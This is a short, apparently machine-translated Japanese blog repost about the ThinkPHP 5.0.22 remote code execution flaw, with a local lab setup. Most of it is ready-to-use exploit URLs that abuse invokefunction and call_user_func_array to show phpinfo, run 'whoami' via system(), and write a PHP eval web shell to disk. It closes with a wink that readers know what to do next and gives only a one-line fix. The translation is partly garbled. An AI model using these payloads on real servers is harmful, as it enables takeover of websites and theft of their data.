thinkphp5.0リモート実行される脆弱性

0x01の脆弱性プロファイル

以来、十分な安全監視せずThinkPHP5フレームコントローラ名、ルートの強制開口を招くことなく、特定の要求を直接Getshell(制御サーバ)であってもよい偽装することができ

 

ビルドに0x02の環境

Phpstudy:PHP-5.5.38 + Apacheの

私はバージョンをダウンロードダウンロード不備バージョンである thinkphp_5.0.22 ビルドは、図2の良い未来。

ダウンロードリンク:http://www.thinkphp.cn/donate/download/id/1261.html

 

 

 

0x03の脆弱性ペイロード

 phpinfoのページ:

http://127.0.0.1/thinkphp_5.0.22/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 

 

 

実行にwhoami コマンドを:

http://127.0.0.1/thinkphp_5.0.22/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

 

 

 

 

ライトシェル

 

http:// 127.0.0.1 /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval ($ _GET [%22snowwolf%22])?^%の3Eの%3Eshell.php

 

 

 

 

 

 

 

 

 

そして、あなたはそれを行う方法を知っていますよ。

ハッハッハ

 

0X03のバグ修正

私たちは、あなたが最新バージョンにアップデートすることをお勧めします

 

おすすめ

転載: www.cnblogs.com/bflw/p/12448379.html